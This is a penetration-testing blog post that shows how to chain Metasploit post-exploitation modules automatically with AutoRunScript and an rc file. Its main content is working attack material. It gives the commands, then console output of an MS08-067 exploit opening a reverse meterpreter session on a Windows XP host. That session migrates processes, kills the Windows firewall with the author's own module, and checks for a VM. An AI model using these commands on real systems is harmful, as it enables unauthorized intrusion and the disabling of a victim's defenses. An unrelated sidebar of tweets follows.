Automation is the name of the pentest game
Metasploit auto run scripts are great when you need a module to run automatically post exploitation. Getting a single script to run post meterpreter is pretty easy, but what if you wanted multiple post scripts to run? From the msfconsole prompt run: set AutoRunScript multi_console_command -rc “path/name of rc file”
msf > set AutoRunScript multi_console_command -rc /root/autoruncommands.rc
Inside of the rc file just list the commands one by one like so:
run post/windows/manage/migrate run post/windows/manage/killfw run post/windows/gather/checkvm
Now save the file autoruncommands.rc inside of the root folder. Don’t use killfw because you won’t find it in your install. It is a module I wrote to autokill the windows firewall.
Now lets watch it in action:
msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 10.10.200.40:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (AlwaysOn NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (752128 bytes) to 10.10.101.11 [*] Meterpreter session 6 opened (10.10.200.40:4444 -> 10.10.101.11:1125) at 2012-04-22 17:58:16 -0400 meterpreter > [*] Session ID 6 (10.10.200.40:4444 -> 10.10.101.11:1125) processing AutoRunScript 'multi_console_command -rc /root/autoruncommands.rc' [*] Running Command List ... [*] Running command run post/windows/manage/migrate [*] Running module against XPVM-SP2 [*] Current server process: svchost.exe (1324) [*] Spawning notepad.exe process to migrate to [+] Migrating to 3984 [+] Successfully migrated to process 3984 [*] Running command run post/windows/manage/killfw [+] Killing Windows Firewall... [+] Done! [*] Running command run post/windows/gather/checkvm [*] Checking if XPVM-SP2 is a Virtual Machine ..... [*] This is a VMware Virtual Machine
- @canammissing wallpaper inspired by missing 411 #missing411 #davidpaulides https://t.co/bD3Ua0yYvB 2 days ago
- @dabeave666 @katzsp @_lennart Of course! I use the syslog output from Sagan into Graylog extracting the elements fr… twitter.com/i/web/status/9… 5 days ago
- @graylog2 #graylog Amazed with how awesome this open source product is! Under 1hr and I have extractors giving me u… twitter.com/i/web/status/9… 5 days ago
- #homescreensaturdays https://t.co/aQ0UkKW5Ch 6 days ago
- @graylog2 #graylog any good resources for Windows log extractor regex? Failed rdp, failed auth ect? 6 days ago
- @Hacker_Horse Where at in Jersey ? I'm in PA and not much infosec going on here. 6 days ago
- An error has occurred; the feed is probably down. Try again later.